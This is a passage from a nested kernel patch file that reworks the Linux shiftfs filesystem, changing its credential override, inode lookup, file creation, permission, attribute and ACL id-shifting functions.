++static void shiftfs_copyflags(struct inode *from, struct inode *to)
++{
++	unsigned int mask = S_SYNC | S_IMMUTABLE | S_APPEND | S_NOATIME;
+ 
+-	return cred;
++	inode_set_flags(to, from->i_flags & mask, mask);
+ }
+ 
+-static void shiftfs_old_creds(const struct cred *oldcred,
+-			      const struct cred **newcred)
++static void shiftfs_file_accessed(struct file *file)
+ {
+-	if (!*newcred)
++	struct inode *upperi, *loweri;
++
++	if (file->f_flags & O_NOATIME)
+ 		return;
+ 
+-	revert_creds(oldcred);
+-	put_cred(*newcred);
++	upperi = file_inode(file);
++	loweri = upperi->i_private;
++
++	if (!loweri)
++		return;
++
++	upperi->i_mtime = loweri->i_mtime;
++	upperi->i_ctime = loweri->i_ctime;
++
++	touch_atime(&file->f_path);
+ }
+ 
+-static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
++static int shiftfs_parse_mount_options(struct shiftfs_super_info *sbinfo,
++				       char *options)
+ {
+ 	char *p;
+ 	substring_t args[MAX_OPT_ARGS];
+ 
+-	ssi->mark = false;
++	sbinfo->mark = false;
++	sbinfo->passthrough = 0;
+ 
+ 	while ((p = strsep(&options, ",")) != NULL) {
+-		int token;
++		int err, intarg, token;
+ 
+ 		if (!*p)
+ 			continue;
+@@ -91,121 +188,140 @@ static int shiftfs_parse_options(struct shiftfs_super_info *ssi, char *options)
+ 		token = match_token(p, tokens, args);
+ 		switch (token) {
+ 		case OPT_MARK:
+-			ssi->mark = true;
++			sbinfo->mark = true;
++			break;
++		case OPT_PASSTHROUGH:
++			err = match_int(&args[0], &intarg);
++			if (err)
++				return err;
++
++			if (intarg & ~SHIFTFS_PASSTHROUGH_ALL)
++				return -EINVAL;
++
++			sbinfo->passthrough = intarg;
+ 			break;
+ 		default:
+ 			return -EINVAL;
+ 		}
+ 	}
++
+ 	return 0;
+ }
+ 
+ static void shiftfs_d_release(struct dentry *dentry)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	dput(real);
++	if (lowerd)
++		dput(lowerd);
+ }
+ 
+ static struct dentry *shiftfs_d_real(struct dentry *dentry,
+ 				     const struct inode *inode)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
++
++	if (inode && d_inode(dentry) == inode)
++		return dentry;
+ 
+-	if (unlikely(real->d_flags & DCACHE_OP_REAL))
+-		return real->d_op->d_real(real, real->d_inode);
++	lowerd = d_real(lowerd, inode);
++	if (lowerd && (!inode || inode == d_inode(lowerd)))
++		return lowerd;
+ 
+-	return real;
++	WARN(1, "shiftfs_d_real(%pd4, %s:%lu): real dentry not found\n", dentry,
++	     inode ? inode->i_sb->s_id : "NULL", inode ? inode->i_ino : 0);
++	return dentry;
+ }
+ 
+ static int shiftfs_d_weak_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_is_negative(lowerd) != d_is_negative(dentry))
+ 		return 0;
+ 
+-	if (!(real->d_flags & DCACHE_OP_WEAK_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_WEAK_REVALIDATE))
++		err = lowerd->d_op->d_weak_revalidate(lowerd, flags);
+ 
+-	return real->d_op->d_weak_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
++
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
++
++	return err;
+ }
+ 
+ static int shiftfs_d_revalidate(struct dentry *dentry, unsigned int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int ret;
++	int err = 1;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 
+-	if (d_unhashed(real))
++	if (d_unhashed(lowerd) ||
++	    ((d_is_negative(lowerd) != d_is_negative(dentry))))
+ 		return 0;
+ 
+-	/*
+-	 * inode state of underlying changed from positive to negative
+-	 * or vice versa; force a lookup to update our view
+-	 */
+-	if (d_is_negative(real) != d_is_negative(dentry))
+-		return 0;
++	if (flags & LOOKUP_RCU)
++		return -ECHILD;
+ 
+-	if (!(real->d_flags & DCACHE_OP_REVALIDATE))
+-		return 1;
++	if ((lowerd->d_flags & DCACHE_OP_REVALIDATE))
++		err = lowerd->d_op->d_revalidate(lowerd, flags);
+ 
+-	ret = real->d_op->d_revalidate(real, flags);
++	if (d_really_is_positive(dentry)) {
++		struct inode *inode = d_inode(dentry);
++		struct inode *loweri = d_inode(lowerd);
+ 
+-	if (ret == 0 && !(flags & LOOKUP_RCU))
+-		d_invalidate(real);
++		shiftfs_copyattr(loweri, inode);
++		if (!inode->i_nlink)
++			err = 0;
++	}
+ 
+-	return ret;
++	return err;
+ }
+ 
+ static const struct dentry_operations shiftfs_dentry_ops = {
+-	.d_release	= shiftfs_d_release,
+-	.d_real		= shiftfs_d_real,
+-	.d_revalidate	= shiftfs_d_revalidate,
++	.d_release	   = shiftfs_d_release,
++	.d_real		   = shiftfs_d_real,
++	.d_revalidate	   = shiftfs_d_revalidate,
+ 	.d_weak_revalidate = shiftfs_d_weak_revalidate,
+ };
+ 
+-static int shiftfs_readlink(struct dentry *dentry, char __user *data,
+-			    int flags)
+-{
+-	struct dentry *real = dentry->d_fsdata;
+-	const struct inode_operations *iop = real->d_inode->i_op;
+-
+-	if (iop->readlink)
+-		return iop->readlink(real, data, flags);
+-
+-	return -EINVAL;
+-}
+-
+ static const char *shiftfs_get_link(struct dentry *dentry, struct inode *inode,
+ 				    struct delayed_call *done)
+ {
+-	if (dentry) {
+-		struct dentry *real = dentry->d_fsdata;
+-		struct inode *reali = real->d_inode;
+-		const struct inode_operations *iop = reali->i_op;
+-		const char *res = ERR_PTR(-EPERM);
+-
+-		if (iop->get_link)
+-			res = iop->get_link(real, reali, done);
++	const char *p;
++	const struct cred *oldcred;
++	struct dentry *lowerd;
+ 
+-		return res;
+-	} else {
+-		/* RCU lookup not supported */
++	/* RCU lookup not supported */
++	if (!dentry)
+ 		return ERR_PTR(-ECHILD);
+-	}
++
++	lowerd = dentry->d_fsdata;
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	p = vfs_get_link(lowerd, done);
++	revert_creds(oldcred);
++
++	return p;
+ }
+ 
+ static int shiftfs_setxattr(struct dentry *dentry, struct inode *inode,
+ 			    const char *name, const void *value,
+ 			    size_t size, int flags)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	int err = -EOPNOTSUPP;
+-	const struct cred *oldcred, *newcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	int err;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_setxattr(lowerd, name, value, size, flags);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_setxattr(real, name, value, size, flags);
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(lowerd->d_inode, inode);
+ 
+ 	return err;
+ }
+@@ -214,13 +330,13 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ 			     struct dentry *dentry, struct inode *inode,
+ 			     const char *name, void *value, size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_getxattr(real, name, value, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_getxattr(lowerd, name, value, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+@@ -228,26 +344,29 @@ static int shiftfs_xattr_get(const struct xattr_handler *handler,
+ static ssize_t shiftfs_listxattr(struct dentry *dentry, char *list,
+ 				 size_t size)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_listxattr(real, list, size);
+-	shiftfs_old_creds(oldcred, &newcred);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_listxattr(lowerd, list, size);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_removexattr(struct dentry *dentry, const char *name)
+ {
+-	struct dentry *real = dentry->d_fsdata;
++	struct dentry *lowerd = dentry->d_fsdata;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = vfs_removexattr(lowerd, name);
++	revert_creds(oldcred);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	err = vfs_removexattr(real, name);
+-	shiftfs_old_creds(oldcred, &newcred);
++	/* update c/mtime */
++	shiftfs_copyattr(lowerd->d_inode, d_inode(dentry));
+ 
+ 	return err;
+ }
+@@ -262,93 +381,157 @@ static int shiftfs_xattr_set(const struct xattr_handler *handler,
+ 	return shiftfs_setxattr(dentry, inode, name, value, size, flags);
+ }
+ 
+-static void shiftfs_fill_inode(struct inode *inode, struct dentry *dentry)
++static int shiftfs_inode_test(struct inode *inode, void *data)
+ {
+-	struct inode *reali;
+-
+-	if (!dentry)
+-		return;
+-
+-	reali = dentry->d_inode;
+-
+-	if (!reali->i_op->get_link)
+-		inode->i_opflags |= IOP_NOFOLLOW;
++	return inode->i_private == data;
++}
+ 
+-	inode->i_mapping = reali->i_mapping;
+-	inode->i_private = dentry;
++static int shiftfs_inode_set(struct inode *inode, void *data)
++{
++	inode->i_private = data;
++	return 0;
+ }
+ 
+-static int shiftfs_make_object(struct inode *dir, struct dentry *dentry,
+-			       umode_t mode, const char *symlink,
+-			       struct dentry *hardlink, bool excl)
++static int shiftfs_create_object(struct inode *diri, struct dentry *dentry,
++				 umode_t mode, const char *symlink,
++				 struct dentry *hardlink, bool excl)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-	bool op_ok = false;
++	const struct cred *oldcred;
++	struct cred *newcred;
++	void *loweri_iop_ptr = NULL;
++	umode_t modei = mode;
++	struct super_block *dir_sb = diri->i_sb;
++	struct dentry *lowerd_new = dentry->d_fsdata;
++	struct inode *inode = NULL, *loweri_dir = diri->i_private;
++	const struct inode_operations *loweri_dir_iop = loweri_dir->i_op;
++	struct dentry *lowerd_link = NULL;
+ 
+ 	if (hardlink) {
+-		op_ok = iop->link;
++		loweri_iop_ptr = loweri_dir_iop->link;
+ 	} else {
+ 		switch (mode & S_IFMT) {
+ 		case S_IFDIR:
+-			op_ok = iop->mkdir;
++			loweri_iop_ptr = loweri_dir_iop->mkdir;
+ 			break;
+ 		case S_IFREG:
+-			op_ok = iop->create;
++			loweri_iop_ptr = loweri_dir_iop->create;
+ 			break;
+ 		case S_IFLNK:
+-			op_ok = iop->symlink;
++			loweri_iop_ptr = loweri_dir_iop->symlink;
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			loweri_iop_ptr = loweri_dir_iop->mknod;
++			break;
+ 		}
+ 	}
+-	if (!op_ok)
+-		return -EINVAL;
++	if (!loweri_iop_ptr) {
++		err = -EINVAL;
++		goto out_iput;
++	}
+ 
++	inode_lock_nested(loweri_dir, I_MUTEX_PARENT);
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, mode, NULL);
+-	if (!newi)
+-		return -ENOMEM;
++	if (!hardlink) {
++		inode = new_inode(dir_sb);
++		if (!inode) {
++			err = -ENOMEM;
++			goto out_iput;
++		}
++
++		/*
++		 * new_inode() will have added the new inode to the super
++		 * block's list of inodes. Further below we will call
++		 * inode_insert5() Which would perform the same operation again
++		 * thereby corrupting the list. To avoid this raise I_CREATING
++		 * in i_state which will cause inode_insert5() to skip this
++		 * step. I_CREATING will be cleared by d_instantiate_new()
++		 * below.
++		 */
++		spin_lock(&inode->i_lock);
++		inode->i_state |= I_CREATING;
++		spin_unlock(&inode->i_lock);
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++		inode_init_owner(inode, diri, mode);
++		modei = inode->i_mode;
++	}
+ 
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
++	err = shiftfs_override_object_creds(dentry->d_sb, &oldcred, &newcred,
++					    dentry, modei, hardlink != NULL);
++	if (err)
++		goto out_iput;
+ 
+-	err = -EINVAL;		/* shut gcc up about uninit var */
+ 	if (hardlink) {
+-		struct dentry *realhardlink = hardlink->d_fsdata;
+-
+-		err = vfs_link(realhardlink, reali, new, NULL);
++		lowerd_link = hardlink->d_fsdata;
++		err = vfs_link(lowerd_link, loweri_dir, lowerd_new, NULL);
+ 	} else {
+-		switch (mode & S_IFMT) {
++		switch (modei & S_IFMT) {
+ 		case S_IFDIR:
+-			err = vfs_mkdir(reali, new, mode);
++			err = vfs_mkdir(loweri_dir, lowerd_new, modei);
+ 			break;
+ 		case S_IFREG:
+-			err = vfs_create(reali, new, mode, excl);
++			err = vfs_create(loweri_dir, lowerd_new, modei, excl);
+ 			break;
+ 		case S_IFLNK:
+-			err = vfs_symlink(reali, new, symlink);
++			err = vfs_symlink(loweri_dir, lowerd_new, symlink);
++			break;
++		case S_IFSOCK:
++			/* fall through */
++		case S_IFIFO:
++			err = vfs_mknod(loweri_dir, lowerd_new, modei, 0);
++			break;
++		default:
++			err = -EINVAL;
++			break;
+ 		}
+ 	}
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_revert_object_creds(oldcred, newcred);
+ 
++	if (!err && WARN_ON(!lowerd_new->d_inode))
++		err = -EIO;
+ 	if (err)
+-		goto out_dput;
++		goto out_iput;
++
++	if (hardlink) {
++		inode = d_inode(hardlink);
++		ihold(inode);
++
++		/* copy up times from lower inode */
++		shiftfs_copyattr(d_inode(lowerd_link), inode);
++		set_nlink(d_inode(hardlink), d_inode(lowerd_link)->i_nlink);
++		d_instantiate(dentry, inode);
++	} else {
++		struct inode *inode_tmp;
++		struct inode *loweri_new = d_inode(lowerd_new);
++
++		inode_tmp = inode_insert5(inode, (unsigned long)loweri_new,
++					  shiftfs_inode_test, shiftfs_inode_set,
++					  loweri_new);
++		if (unlikely(inode_tmp != inode)) {
++			pr_err_ratelimited("shiftfs: newly created inode found in cache\n");
++			iput(inode_tmp);
++			err = -EINVAL;
++			goto out_iput;
++		}
+ 
+-	shiftfs_fill_inode(newi, new);
++		ihold(loweri_new);
++		shiftfs_fill_inode(inode, loweri_new->i_ino, loweri_new->i_mode,
++				   0, lowerd_new);
++		d_instantiate_new(dentry, inode);
++	}
+ 
+-	d_instantiate(dentry, newi);
++	shiftfs_copyattr(loweri_dir, diri);
++	if (loweri_iop_ptr == loweri_dir_iop->mkdir)
++		set_nlink(diri, loweri_dir->i_nlink);
+ 
+-	new = NULL;
+-	newi = NULL;
++	inode = NULL;
+ 
+- out_dput:
+-	dput(new);
+-	iput(newi);
+-	inode_unlock(reali);
++out_iput:
++	iput(inode);
++	inode_unlock(loweri_dir);
+ 
+ 	return err;
+ }
+@@ -358,7 +541,7 @@ static int shiftfs_create(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFREG;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, excl);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
+ }
+ 
+ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+@@ -366,39 +549,52 @@ static int shiftfs_mkdir(struct inode *dir, struct dentry *dentry,
+ {
+ 	mode |= S_IFDIR;
+ 
+-	return shiftfs_make_object(dir, dentry, mode, NULL, NULL, false);
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
+ 			struct dentry *dentry)
+ {
+-	return shiftfs_make_object(dir, dentry, 0, NULL, hardlink, false);
++	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
++}
++
++static int shiftfs_mknod(struct inode *dir, struct dentry *dentry, umode_t mode,
++			 dev_t rdev)
++{
++	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
++		return -EPERM;
++
++	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
+ }
+ 
+ static int shiftfs_symlink(struct inode *dir, struct dentry *dentry,
+ 			   const char *symlink)
+ {
+-	return shiftfs_make_object(dir, dentry, S_IFLNK, symlink, NULL, false);
++	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
+ }
+ 
+ static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
+ {
+-	struct dentry *real = dir->i_private, *new = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock_nested(reali, I_MUTEX_PARENT);
+-
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
++	const struct cred *oldcred;
+ 
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	inode_lock_nested(loweri, I_MUTEX_PARENT);
+ 	if (rmdir)
+-		err = vfs_rmdir(reali, new);
++		err = vfs_rmdir(loweri, lowerd);
+ 	else
+-		err = vfs_unlink(reali, new, NULL);
++		err = vfs_unlink(loweri, lowerd, NULL);
++	inode_unlock(loweri);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	shiftfs_copyattr(loweri, dir);
++	set_nlink(d_inode(dentry), loweri->i_nlink);
++	if (!err)
++		d_drop(dentry);
++
++	set_nlink(dir, loweri->i_nlink);
+ 
+ 	return err;
+ }
+@@ -417,27 +613,30 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ 			  struct inode *newdir, struct dentry *new,
+ 			  unsigned int flags)
+ {
+-	struct dentry *rodd = olddir->i_private, *rndd = newdir->i_private,
+-		*realold = old->d_fsdata,
+-		*realnew = new->d_fsdata, *trap;
+-	struct inode *realolddir = rodd->d_inode, *realnewdir = rndd->d_inode;
++	struct dentry *lowerd_dir_old = old->d_parent->d_fsdata,
++		      *lowerd_dir_new = new->d_parent->d_fsdata,
++		      *lowerd_old = old->d_fsdata, *lowerd_new = new->d_fsdata,
++		      *trapd;
++	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
++		     *loweri_dir_new = lowerd_dir_new->d_inode;
+ 	int err = -EINVAL;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 
+-	trap = lock_rename(rndd, rodd);
++	trapd = lock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+-	if (trap == realold || trap == realnew)
++	if (trapd == lowerd_old || trapd == lowerd_new)
+ 		goto out_unlock;
+ 
+-	oldcred = shiftfs_new_creds(&newcred, old->d_sb);
+-
+-	err = vfs_rename(realolddir, realold, realnewdir,
+-			 realnew, NULL, flags);
++	oldcred = shiftfs_override_creds(old->d_sb);
++	err = vfs_rename(loweri_dir_old, lowerd_old, loweri_dir_new, lowerd_new,
++			 NULL, flags);
++	revert_creds(oldcred);
+ 
+-	shiftfs_old_creds(oldcred, &newcred);
++	shiftfs_copyattr(loweri_dir_old, olddir);
++	shiftfs_copyattr(loweri_dir_new, newdir);
+ 
+- out_unlock:
+-	unlock_rename(rndd, rodd);
++out_unlock:
++	unlock_rename(lowerd_dir_new, lowerd_dir_old);
+ 
+ 	return err;
+ }
+@@ -445,304 +644,1210 @@ static int shiftfs_rename(struct inode *olddir, struct dentry *old,
+ static struct dentry *shiftfs_lookup(struct inode *dir, struct dentry *dentry,
+ 				     unsigned int flags)
+ {
+-	struct dentry *real = dir->i_private, *new;
+-	struct inode *reali = real->d_inode, *newi;
+-	const struct cred *oldcred, *newcred;
+-
+-	inode_lock(reali);
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	new = lookup_one_len(dentry->d_name.name, real, dentry->d_name.len);
+-	shiftfs_old_creds(oldcred, &newcred);
+-	inode_unlock(reali);
++	struct dentry *new;
++	struct inode *newi;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_parent->d_fsdata;
++	struct inode *inode = NULL, *loweri = lowerd->d_inode;
++
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	new = lookup_one_len(dentry->d_name.name, lowerd, dentry->d_name.len);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+ 	if (IS_ERR(new))
+ 		return new;
+ 
+ 	dentry->d_fsdata = new;
+ 
+-	newi = NULL;
+-	if (!new->d_inode)
++	newi = new->d_inode;
++	if (!newi)
+ 		goto out;
+ 
+-	newi = shiftfs_new_inode(dentry->d_sb, new->d_inode->i_mode, new);
+-	if (!newi) {
++	inode = iget5_locked(dentry->d_sb, (unsigned long)newi,
++			     shiftfs_inode_test, shiftfs_inode_set, newi);
++	if (!inode) {
+ 		dput(new);
+ 		return ERR_PTR(-ENOMEM);
+ 	}
++	if (inode->i_state & I_NEW) {
++		/*
++		 * inode->i_private set by shiftfs_inode_set(), but we still
++		 * need to take a reference
++		*/
++		ihold(newi);
++		shiftfs_fill_inode(inode, newi->i_ino, newi->i_mode, 0, new);
++		unlock_new_inode(inode);
++	}
+ 
+- out:
+-	return d_splice_alias(newi, dentry);
++out:
++	return d_splice_alias(inode, dentry);
+ }
+ 
+ static int shiftfs_permission(struct inode *inode, int mask)
+ {
+-	struct dentry *real = inode->i_private;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+ 	int err;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
+ 
+-	if (mask & MAY_NOT_BLOCK)
++	if (!loweri) {
++		WARN_ON(!(mask & MAY_NOT_BLOCK));
+ 		return -ECHILD;
++	}
+ 
+-	oldcred = shiftfs_new_creds(&newcred, inode->i_sb);
+-	if (iop->permission)
+-		err = iop->permission(reali, mask);
+-	else
+-		err = generic_permission(reali, mask);
+-	shiftfs_old_creds(oldcred, &newcred);
++	err = generic_permission(inode, mask);
++	if (err)
++		return err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = inode_permission(loweri, mask);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_fiemap(struct inode *inode,
++			  struct fiemap_extent_info *fieinfo, u64 start,
++			  u64 len)
++{
++	int err;
++	const struct cred *oldcred;
++	struct inode *loweri = inode->i_private;
++
++	if (!loweri->i_op->fiemap)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	if (fieinfo->fi_flags & FIEMAP_FLAG_SYNC)
++		filemap_write_and_wait(loweri->i_mapping);
++	err = loweri->i_op->fiemap(loweri, fieinfo, start, len);
++	revert_creds(oldcred);
++
++	return err;
++}
++
++static int shiftfs_tmpfile(struct inode *dir, struct dentry *dentry,
++			   umode_t mode)
++{
++	int err;
++	const struct cred *oldcred;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = dir->i_private;
++
++	if (!loweri->i_op->tmpfile)
++		return -EOPNOTSUPP;
++
++	oldcred = shiftfs_override_creds(dir->i_sb);
++	err = loweri->i_op->tmpfile(loweri, lowerd, mode);
++	revert_creds(oldcred);
+ 
+ 	return err;
+ }
+ 
+ static int shiftfs_setattr(struct dentry *dentry, struct iattr *attr)
+ {
+-	struct dentry *real = dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
++	struct dentry *lowerd = dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
+ 	struct iattr newattr = *attr;
+-	const struct cred *oldcred, *newcred;
++	const struct cred *oldcred;
+ 	struct super_block *sb = dentry->d_sb;
+ 	int err;
+ 
++	err = setattr_prepare(dentry, attr);
++	if (err)
++		return err;
++
+ 	newattr.ia_uid = KUIDT_INIT(from_kuid(sb->s_user_ns, attr->ia_uid));
+ 	newattr.ia_gid = KGIDT_INIT(from_kgid(sb->s_user_ns, attr->ia_gid));
+ 
+-	oldcred = shiftfs_new_creds(&newcred, dentry->d_sb);
+-	inode_lock(reali);
+-	if (iop->setattr)
+-		err = iop->setattr(real, &newattr);
+-	else
+-		err = simple_setattr(real, &newattr);
+-	inode_unlock(reali);
+-	shiftfs_old_creds(oldcred, &newcred);
++	inode_lock(loweri);
++	oldcred = shiftfs_override_creds(dentry->d_sb);
++	err = notify_change(lowerd, attr, NULL);
++	revert_creds(oldcred);
++	inode_unlock(loweri);
+ 
+-	if (err)
+-		return err;
++	shiftfs_copyattr(loweri, d_inode(dentry));
+ 
+-	/* all OK, reflect the change on our inode */
+-	setattr_copy(d_inode(dentry), attr);
+-	return 0;
++	return err;
+ }
+ 
+ static int shiftfs_getattr(const struct path *path, struct kstat *stat,
+ 			   u32 request_mask, unsigned int query_flags)
+ {
+ 	struct inode *inode = path->dentry->d_inode;
+-	struct dentry *real = path->dentry->d_fsdata;
+-	struct inode *reali = real->d_inode;
+-	const struct inode_operations *iop = reali->i_op;
+-	struct path newpath = { .mnt = path->dentry->d_sb->s_fs_info, .dentry = real };
+-	int err = 0;
+-
+-	if (iop->getattr)
+-		err = iop->getattr(&newpath, stat, request_mask, query_flags);
+-	else
+-		generic_fillattr(reali, stat);
++	struct dentry *lowerd = path->dentry->d_fsdata;
++	struct inode *loweri = lowerd->d_inode;
++	struct shiftfs_super_info *info = path->dentry->d_sb->s_fs_info;
++	struct path newpath = { .mnt = info->mnt, .dentry = lowerd };
++	struct user_namespace *from_ns = loweri->i_sb->s_user_ns;
++	struct user_namespace *to_ns = inode->i_sb->s_user_ns;
++	const struct cred *oldcred;
++	int err;
++
++	oldcred = shiftfs_override_creds(inode->i_sb);
++	err = vfs_getattr(&newpath, stat, request_mask, query_flags);
++	revert_creds(oldcred);
+ 
+ 	if (err)
+ 		return err;
+ 
+ 	/* transform the underlying id */
+-	stat->uid = make_kuid(inode->i_sb->s_user_ns, __kuid_val(stat->uid));
+-	stat->gid = make_kgid(inode->i_sb->s_user_ns, __kgid_val(stat->gid));
++	stat->uid = shift_kuid(from_ns, to_ns, stat->uid);
++	stat->gid = shift_kgid(from_ns, to_ns, stat->gid);
+ 	return 0;
+ }
+ 
+-static const struct inode_operations shiftfs_inode_ops = {
+-	.lookup		= shiftfs_lookup,
+-	.getattr	= shiftfs_getattr,
+-	.setattr	= shiftfs_setattr,
+-	.permission	= shiftfs_permission,
+-	.mkdir		= shiftfs_mkdir,
+-	.symlink	= shiftfs_symlink,
+-	.get_link	= shiftfs_get_link,
+-	.readlink	= shiftfs_readlink,
+-	.unlink		= shiftfs_unlink,
+-	.rmdir		= shiftfs_rmdir,
+-	.rename		= shiftfs_rename,
+-	.link		= shiftfs_link,
+-	.create		= shiftfs_create,
+-	.mknod		= NULL,	/* no special files currently */
+-	.listxattr	= shiftfs_listxattr,
+-};
++#ifdef CONFIG_SHIFT_FS_POSIX_ACL
+ 
+-static struct inode *shiftfs_new_inode(struct super_block *sb, umode_t mode,
+-				       struct dentry *dentry)
++static int
++shift_acl_ids(struct user_namespace *from, struct user_namespace *to,
++	      struct posix_acl *acl)
+ {
+-	struct inode *inode;
+-
+-	inode = new_inode(sb);
+-	if (!inode)
+-		return NULL;
+-
+-	/*
+-	 * our inode is completely vestigial.  All lookups, getattr
+-	 * and permission checks are done on the underlying inode, so
+-	 * what the user sees is entirely from the underlying inode.
+-	 */
+-	mode &= S_IFMT;
++	int i;
++
++	for (i = 0; i < acl->a_count; i++) {
++		struct posix_acl_entry *e = &acl->a_entries[i];
++		switch(e->e_tag) {
++		case ACL_USER:
++			e->e_uid = shift_kuid(from, to, e->e_uid);
++			if (!uid_valid(e->e_uid))
++				return -EOVERFLOW;
++			break;
++		case ACL_GROUP:
++			e->e_gid = shift_kgid(from, to, e->e_gid);
++			if (!gid_valid(e->e_gid))
++				return -EOVERFLOW;
++			break;
++		}
++	}
++	return 0;
++}
+ 
+-	inode->i_ino = get_next_ino();
+-	inode->i_mode = mode;
+-	inode->i_flags |= S_NOATIME | S_NOCMTIME;
++static void
++shift_acl_xattr_ids(struct user_namespace *from, struct user_namespace *to,
++		    void *value, size_t size)
++{
++	struct posix_acl_xattr_header *header = value;
++	struct posix_acl_xattr_entry *entry = (void *)(header + 1), *end;
++	int count;
++	kuid_t kuid;
++	kgid_t kgid;
+ 
+-	inode->i_op = &shiftfs_inode_ops;
++	if (!value)
++		return;
++	if (size < sizeof(struct posix_acl_xattr_header))
++		return;
++	if (header->a_version != cpu_to_le32(POSIX_ACL_XATTR_VERSION))
++		return;
+ 
+-	shiftfs_fill_inode(inode, dentry);
++	count = posix_acl_xattr_count(size);
++	if (count < 0)
++		return;
++	if (count == 0)
++		return;
+ 
+-	return inode;
++	for (end = entry + count; entry != end; entry++) {
++		switch(le16_to_cpu(entry->e_tag)) {
++		case ACL_USER:
++			kuid = make_kuid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kuid = shift_kuid(from, to, kuid);
++			entry->e_id = cpu_to_le32(from_kuid(&init_user_ns, kuid));
++			break;
++		case ACL_GROUP:
++			kgid = make_kgid(&init_user_ns, le32_to_cpu(entry->e_id));
++			kgid = shift_kgid(from, to, kgid);
